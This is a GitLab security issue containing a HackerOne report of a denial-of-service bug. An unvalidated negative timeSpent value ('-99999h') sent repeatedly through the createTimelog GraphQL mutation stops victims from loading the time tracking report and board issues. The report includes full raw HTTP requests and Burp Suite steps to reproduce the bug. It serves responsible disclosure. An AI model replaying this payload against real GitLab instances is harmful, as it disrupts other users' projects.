Unvalidated `timeSpent` value in POST /api/graphql `createTimelog` operation leads to unable to load issues on Issue board

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2053154 by toukakirishima on 2023-07-06, assigned to @cmaxim:

Report | Attachments | How To Reproduce

Report

Summary

I found a DOS vulnerability when add Time spent on Issue, as an attacker I can make the victim unable to see the Time tracking report and also see the Issue on the Board.

Normally you can see Time tracking report and Issue on Board.

But as an attacker I can make the victim unable to see the Time tracking report and also see the Issue on the Board.

Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.

And Touka Kirishima (victim) made Issues.

Steps to reproduce

1. Go to Issues

2. Add Time spent

3. Click save and makesure burpsuite is on. You will see request like following, Example :

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: x  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23  
Content-Type: application/json  
X-Csrf-Token: x  
X-Gitlab-Feature-Category: team_planning  
Content-Length: 1234  
Origin: https://gitlab.com  
Dnt: 1  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"1","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n  timelogCreate(input: $input) {\n    errors\n    timelog {\n      id\n      issue {\n        ...IssueTimeTrackingFragment\n        __typename\n      }\n      mergeRequest {\n        ...MergeRequestTimeTrackingFragment\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment TimelogFragment on Timelog {\n  __typename\n  id\n  timeSpent\n  user {\n    id\n    name\n    __typename\n  }\n  spentAt\n  note {\n    id\n    body\n    __typename\n  }\n  summary\n  userPermissions {\n    adminTimelog\n    __typename\n  }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n"}]  

4. Send to Repeater
5. Change timeSpent. Example :

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: x  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23  
Content-Type: application/json  
X-Csrf-Token: x  
X-Gitlab-Feature-Category: team_planning  
Content-Length: 1234  
Origin: https://gitlab.com  
Dnt: 1  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"-99999h","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n  timelogCreate(input: $input) {\n    errors\n    timelog {\n      id\n      issue {\n        ...IssueTimeTrackingFragment\n        __typename\n      }\n      mergeRequest {\n        ...MergeRequestTimeTrackingFragment\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment TimelogFragment on Timelog {\n  __typename\n  id\n  timeSpent\n  user {\n    id\n    name\n    __typename\n  }\n  spentAt\n  note {\n    id\n    body\n    __typename\n  }\n  summary\n  userPermissions {\n    adminTimelog\n    __typename\n  }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n"}]  

6. Click Send until the Response HTTP/2 500 Internal Server Error appears (usually 5 times when you click Send)

7. Reload the page and you unable to see the Time tracking report and see Issues on the Board

POV from Attacker

POV from Victim

POC

bandicam_2023-07-06_22-42-12-864.mp4

Output of checks

This bug happens on GitLab.com

Impact

• Attacker can make victim unable to see the Time tracking report.
• Attacker can make victim unable to see Issues on the Board.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• image.png
• bandicam_2023-07-06_22-42-12-864.mp4

How To Reproduce

Please add reproducibility information to this section: